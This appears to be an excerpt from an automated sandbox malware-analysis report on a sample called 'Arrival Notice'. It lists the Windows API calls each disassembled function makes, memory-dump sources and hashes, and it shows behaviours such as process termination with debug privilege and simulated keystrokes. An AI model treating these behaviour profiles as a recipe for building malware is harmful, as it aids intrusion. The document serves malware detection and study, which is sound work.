                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0095C2E4
                                              • ImageList_EndDrag.COMCTL32 ref: 0095C2EA
                                              • ReleaseCapture.USER32 ref: 0095C2F0
                                              • SetWindowTextW.USER32(?,00000000), ref: 0095C39A
                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0095C3AD
                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0095C48F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                              • API String ID: 1924731296-2107944366
                                              • Opcode ID: 77ab7e11ceb0661608f79977ec1082c655170d9ee80760a9a72bd34dce6f3cf8
                                              • Instruction ID: 899a608f590157710c59053d066ed3a72878f22ec76e83f5c6dba2a8c8d4bbaa
                                              • Opcode Fuzzy Hash: 77ab7e11ceb0661608f79977ec1082c655170d9ee80760a9a72bd34dce6f3cf8
                                              • Instruction Fuzzy Hash: 3051AC70218304AFDB10EF29C855F6A7BE5FB88315F04462EF9918B2F1DB30A949DB52
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0095F910), ref: 0094903D
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0095F910), ref: 00949071
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009491EB
                                              • SysFreeString.OLEAUT32(?), ref: 00949215
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: 9d79744ca6f3adecdaacf92b328aea0bd64b434ee19213575cde950d4efddd39
                                              • Instruction ID: a81db9a925529c752259133bd0cd38fc69d2c2168b71b105461b4a38f6dfc96d
                                              • Opcode Fuzzy Hash: 9d79744ca6f3adecdaacf92b328aea0bd64b434ee19213575cde950d4efddd39
                                              • Instruction Fuzzy Hash: 93F15E71A00219EFCF04DF94C888EAEB7B9FF89315F108599F516AB290DB31AE45CB50
                                              APIs
                                              • _memset.LIBCMT ref: 0094F9C9
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094FB5C
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0094FB80
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094FBC0
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094FBE2
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094FD5E
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0094FD90
                                              • CloseHandle.KERNEL32(?), ref: 0094FDBF
                                              • CloseHandle.KERNEL32(?), ref: 0094FE36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: 5c64d193e923a81eb743b549a01aa9569248c9e43ade8013faa123e91b9c82a4
                                              • Instruction ID: 121495971ebcfebcb5442164d39cc43aaff47e0b3b07ef03596793043ac130fb
                                              • Opcode Fuzzy Hash: 5c64d193e923a81eb743b549a01aa9569248c9e43ade8013faa123e91b9c82a4
                                              • Instruction Fuzzy Hash: 40E19031604242DFCB14EF28C4A1E6ABBE5FF85354F14896DF9998B2A2DB31DC44CB52
                                              APIs
                                                • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009338D3,?), ref: 009348C7
                                                • Part of subcall function 009348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009338D3,?), ref: 009348E0
                                                • Part of subcall function 00934CD3: GetFileAttributesW.KERNEL32(?,00933947), ref: 00934CD4
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00934FE2
                                              • _wcscmp.LIBCMT ref: 00934FFC
                                              • MoveFileW.KERNEL32(?,?), ref: 00935017
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: bb30ba51a860ceb9b443df61b2c5f636abda498feed874736df7af09c8bd4348
                                              • Instruction ID: b4c50bdcbe11c0c65ee028c5686e57d7deef0a75c3695fdcaeb266a7fc17d04c
                                              • Opcode Fuzzy Hash: bb30ba51a860ceb9b443df61b2c5f636abda498feed874736df7af09c8bd4348
                                              • Instruction Fuzzy Hash: AB5144B200C7859BC724DBA4C8819DFB3ECEF85351F10492EB289D3151EE75A6888B67
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0095896E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: a876474d616032efb9acca0833c336be15d67839691ed61e03aac9b42109f9ea
                                              • Instruction ID: f9272e586302fa8c9ed42c77e71df0da7148a5ad34dd4a689d83a89fdf97b9f1
                                              • Opcode Fuzzy Hash: a876474d616032efb9acca0833c336be15d67839691ed61e03aac9b42109f9ea
                                              • Instruction Fuzzy Hash: BE51B830504208BFDF20DF2ACC85B6B7B69FB05362F504516FE15F61A1DF71A9889B81
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0090C547
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0090C569
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0090C581
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0090C59F
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0090C5C0
                                              • DestroyIcon.USER32(00000000), ref: 0090C5CF
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0090C5EC
                                              • DestroyIcon.USER32(?), ref: 0090C5FB
                                                • Part of subcall function 0095A71E: DeleteObject.GDI32(00000000), ref: 0095A757
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                              • String ID:
                                              • API String ID: 2819616528-0
                                              • Opcode ID: 338b2d15716b26450da098d74cb66cee294469527023786d9d74169ab2d94747
                                              • Instruction ID: 97a4d28d8edf9acd4b9394f63f2704b5b0d65601ea685cebd5c64871c3cc249c
                                              • Opcode Fuzzy Hash: 338b2d15716b26450da098d74cb66cee294469527023786d9d74169ab2d94747
                                              • Instruction Fuzzy Hash: 5F514974614209EFDB20DF25DC45BAA77B9FB58361F10062AF902D72A0DBB0ED90EB50
                                              APIs
                                                • Part of subcall function 0092AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092AE77
                                                • Part of subcall function 0092AE57: GetCurrentThreadId.KERNEL32 ref: 0092AE7E
                                                • Part of subcall function 0092AE57: AttachThreadInput.USER32(00000000,?,00929B65,?,00000001), ref: 0092AE85
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00929B70
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00929B8D
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00929B90
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00929B99
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00929BB7
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00929BBA
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00929BC3
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00929BDA
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00929BDD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 0635da8eb403e9a0775220dd9e7c5e857e046fe30d097a0645dab02f31ad4b2f
                                              • Instruction ID: 9a4e637aa9830d14c9d30b79b06e948a8ecc605ff1999cb11e36366a086dead2
                                              • Opcode Fuzzy Hash: 0635da8eb403e9a0775220dd9e7c5e857e046fe30d097a0645dab02f31ad4b2f
                                              • Instruction Fuzzy Hash: 0511E171564618BFF7106B61EC8AF6A3B2DEB4C766F110425F244AB0A0C9F25C10EBA4
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00928A84,00000B00,?,?), ref: 00928E0C
                                              • HeapAlloc.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E13
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00928A84,00000B00,?,?), ref: 00928E28
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00928A84,00000B00,?,?), ref: 00928E30
                                              • DuplicateHandle.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E33
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00928A84,00000B00,?,?), ref: 00928E43
                                              • GetCurrentProcess.KERNEL32(00928A84,00000000,?,00928A84,00000B00,?,?), ref: 00928E4B
                                              • DuplicateHandle.KERNEL32(00000000,?,00928A84,00000B00,?,?), ref: 00928E4E
                                              • CreateThread.KERNEL32(00000000,00000000,00928E74,00000000,00000000,00000000), ref: 00928E68
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 97a3fea865031ac2508772dccd5c0d782fde76aff770905da8171514500c6d5e
                                              • Instruction ID: f11369d5a785db0fa316710c0e6733b1fb12d16c35a4d8ec1bf91c90a4946d08
                                              • Opcode Fuzzy Hash: 97a3fea865031ac2508772dccd5c0d782fde76aff770905da8171514500c6d5e
                                              • Instruction Fuzzy Hash: 3E01BFB5654704FFE710AB75EC4DF5B3B6CEB89711F014421FA05DB191CA709800DB20
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              • Opcode ID: f9303d62a5f17e675ef67a95e15461d8aefe54ff722aa6e0e24c769ec9607d59
                                              • Instruction ID: d57593983bc782f5075fc739014cef96f70a5f37fa766414b15c8b32f0fa4363
                                              • Opcode Fuzzy Hash: f9303d62a5f17e675ef67a95e15461d8aefe54ff722aa6e0e24c769ec9607d59
                                              • Instruction Fuzzy Hash: 0791CE71A00219AFDF24DFA5C848FAFBBB8EF85314F10855AF915AB290D7749901CFA0
                                              APIs
                                                • Part of subcall function 00927652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?,?,0092799D), ref: 0092766F
                                                • Part of subcall function 00927652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 0092768A
                                                • Part of subcall function 00927652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 00927698
                                                • Part of subcall function 00927652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?), ref: 009276A8
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00949B1B
                                              • _memset.LIBCMT ref: 00949B28
                                              • _memset.LIBCMT ref: 00949C6B
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00949C97
                                              • CoTaskMemFree.OLE32(?), ref: 00949CA2
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00949CF0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: 370dadb4100dc8f2b6bc74020bfde620d05803a191288e34d47bdcb0583fd8b2
                                              • Instruction ID: 6ded148a7491c6cf35c7fa0e22d64ab9ca6963e96ffa69ef9d72a99f3125d426
                                              • Opcode Fuzzy Hash: 370dadb4100dc8f2b6bc74020bfde620d05803a191288e34d47bdcb0583fd8b2
                                              • Instruction Fuzzy Hash: ED912571D00229ABDB10DFA5DC81EDEBBB9FF08310F20415AF519A7281EB319A44CFA1
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00957093
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 009570A7
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009570C1
                                              • _wcscat.LIBCMT ref: 0095711C
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00957133
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00957161
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: SysListView32
                                              • API String ID: 307300125-78025650
                                              • Opcode ID: 127b7e853cf601c4b0ab1ff59e89a7c68892b16922d1446821f78203dfd6dc07
                                              • Instruction ID: 9a14542ec94d5119e1a729e919f3ab29714d4fe2d76dea6a4c62c2ee179dd868
                                              • Opcode Fuzzy Hash: 127b7e853cf601c4b0ab1ff59e89a7c68892b16922d1446821f78203dfd6dc07
                                              • Instruction Fuzzy Hash: 92418F71A04308ABDB21DFB5DC85BEAB7E8EF48355F10052AF944E7291D6719E888B60
                                              APIs
                                                • Part of subcall function 00933E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00933EB6
                                                • Part of subcall function 00933E91: Process32FirstW.KERNEL32(00000000,?), ref: 00933EC4
                                                • Part of subcall function 00933E91: CloseHandle.KERNEL32(00000000), ref: 00933F8E
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094ECB8
                                              • GetLastError.KERNEL32 ref: 0094ECCB
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0094ECFA
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0094ED77
                                              • GetLastError.KERNEL32(00000000), ref: 0094ED82
                                              • CloseHandle.KERNEL32(00000000), ref: 0094EDB7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: 32e8e4c9a5c540d11597273d2566aa907e122d45ab22f18c51c135c4d3f6c03b
                                              • Instruction ID: 402ae15890f824f61732231fe888dc0ae156d45b07c96455879a91bfdf089979
                                              • Opcode Fuzzy Hash: 32e8e4c9a5c540d11597273d2566aa907e122d45ab22f18c51c135c4d3f6c03b
                                              • Instruction Fuzzy Hash: 2A419A716042109FDB14EF28CC95F6EB7A5BF80714F088459F9829B2D2DB75A804CB96
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 009332C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: 9bf69f6f3b138ceee70dcb1638c52c3e13f1c89f47ae1272e1fb92200a5e6d2b
                                              • Instruction ID: 65321a41cfa93936f875d656da20933b74f40c471a69a8a448506cda3db60a33
                                              • Opcode Fuzzy Hash: 9bf69f6f3b138ceee70dcb1638c52c3e13f1c89f47ae1272e1fb92200a5e6d2b
                                              • Instruction Fuzzy Hash: E2110D3568C34A7BE7015B65DC43C6BB39CEF19374F10402AF52196281D7759B804FB6
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0093454E
                                              • LoadStringW.USER32(00000000), ref: 00934555
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0093456B
                                              • LoadStringW.USER32(00000000), ref: 00934572
                                              • _wprintf.LIBCMT ref: 00934598
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009345B6
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00934593
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 3aac6418ffc0a9ba4ed8672e8301c50d40d95b3fc990de2988f763185634a8aa
                                              • Instruction ID: e610336130bf61fbc7b5e7e65021faf231f108b96c94a559c1d02b6fe762bb03
                                              • Opcode Fuzzy Hash: 3aac6418ffc0a9ba4ed8672e8301c50d40d95b3fc990de2988f763185634a8aa
                                              • Instruction Fuzzy Hash: 9A014FF290430CBFE711A7A5DD89EFB776CEB08312F0005A5BB45D2051EA749E858B71
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                              • GetSystemMetrics.USER32(0000000F), ref: 0095D78A
                                              • GetSystemMetrics.USER32(0000000F), ref: 0095D7AA
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0095D9E5
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0095DA03
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0095DA24
                                              • ShowWindow.USER32(00000003,00000000), ref: 0095DA43
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0095DA68
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0095DA8B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID:
                                              • API String ID: 1211466189-0
